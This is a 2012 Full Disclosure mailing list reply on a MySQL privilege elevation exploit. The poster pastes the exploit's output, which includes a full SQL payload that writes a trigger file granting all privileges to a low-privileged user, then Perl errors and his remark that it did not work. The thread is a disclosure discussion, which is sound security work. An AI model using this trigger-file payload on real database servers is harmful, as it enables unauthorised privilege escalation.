Full Disclosure mailing list archives
Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit
From: Eren Yağdıran <erenyagdiran () gmail com>
Date: Mon, 3 Dec 2012 15:01:38 -0500
Hello guys
i tried this zero day exploit on my local machine
Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch
mod_ssl/2.2.9 OpenSSL/0.9.8g
Database client version: libmysql - 5.0.51a
my exploit output is
select 'TYPE=TRIGGERS' into outfile'/var/lib/mysql/ieee/rootme.TRG'
LINES TERMINATED BY '\ntriggers=\'CREATE DEFINER=`root`@`localhost`
trigger atk after insert on rootme for each row\\nbegin \\nUPDATE
mysql.user SET Select_priv=\\\'Y\\\', Insert_priv=\\\'Y\\\',
Update_priv=\\\'Y\\\', Delete_priv=\\\'Y\\\', Create_priv=\\\'Y\\\',
Drop_priv=\\\'Y\\\', Reload_priv=\\\'Y\\\', Shutdown_priv=\\\'Y\\\',
Process_priv=\\\'Y\\\', File_priv=\\\'Y\\\', Grant_priv=\\\'Y\\\',
References_priv=\\\'Y\\\', Index_priv=\\\'Y\\\', Alter_priv=\\\'Y\\\',
Show_db_priv=\\\'Y\\\', Super_priv=\\\'Y\\\',
Create_tmp_table_priv=\\\'Y\\\', Lock_tables_priv=\\\'Y\\\',
Execute_priv=\\\'Y\\\', Repl_slave_priv=\\\'Y\\\',
Repl_client_priv=\\\'Y\\\', Create_view_priv=\\\'Y\\\',
Show_view_priv=\\\'Y\\\', Create_routine_priv=\\\'Y\\\',
Alter_routine_priv=\\\'Y\\\', Create_user_priv=\\\'Y\\\',
Event_priv=\\\'Y\\\', Trigger_priv=\\\'Y\\\', ssl_type=\\\'Y\\\',
ssl_cipher=\\\'Y\\\', x509_issuer=\\\'Y\\\', x509_subject=\\\'Y\\\',
max_questions=\\\'Y\\\', max_updates=\\\'Y\\\',
max_connections=\\\'Y\\\' WHERE
User=\\\'ieee\\\';\\nend\'\nsql_modes=0\ndefiners=\'root@localhost\'\nclient_cs_names=\'latin1\'\nconnection_cl_names=\'latin1_swedish_ci\'\ndb_cl_names=\'latin1_swedish_ci\'\n';DBD::mysql::db
do failed: Access denied for user 'ieee'@'localhost' (using password:
YES) at org.pl line 31.
DBD::mysql::db do failed: Access denied for user 'ieee'@'localhost'
(using password: YES) at org.pl line 32.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 35.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 44.
DBD::mysql::db do failed: Access denied; you need the CREATE USER
privilege for this operation at org.pl line 52.
DBD::mysql::db do failed: Access denied for user 'ieee'@'localhost'
(using password: YES) at org.pl line 53.
DBD::mysql::db do failed: Lost connection to MySQL server during query
at org.pl line 54.
DBI connect('host=localhost;','rootedbox2',...) failed: Access denied
for user 'rootedbox2'@'localhost' (using password: YES) at org.pl line
58
Can't call method "prepare" on an undefined value at org.pl line 62.
I think its not working.
On Sat, Dec 1, 2012 at 4:26 PM, king cope
<isowarez.isowarez.isowarez () googlemail com> wrote:
(see attachment) Cheerio, Kingcope
-- - Eren Yağdıran http://www.about.me/eren _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- MySQL (Linux) Database Privilege Elevation Zeroday Exploit king cope (Dec 01)
- Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit Michael Wood (Dec 01)
- Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit Kurt Seifried (Dec 02)
- Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit Eren Yağdıran (Dec 04)
- <Possible follow-ups>
- Re: MySQL (Linux) Database Privilege Elevation Zeroday Exploit kai (Dec 05)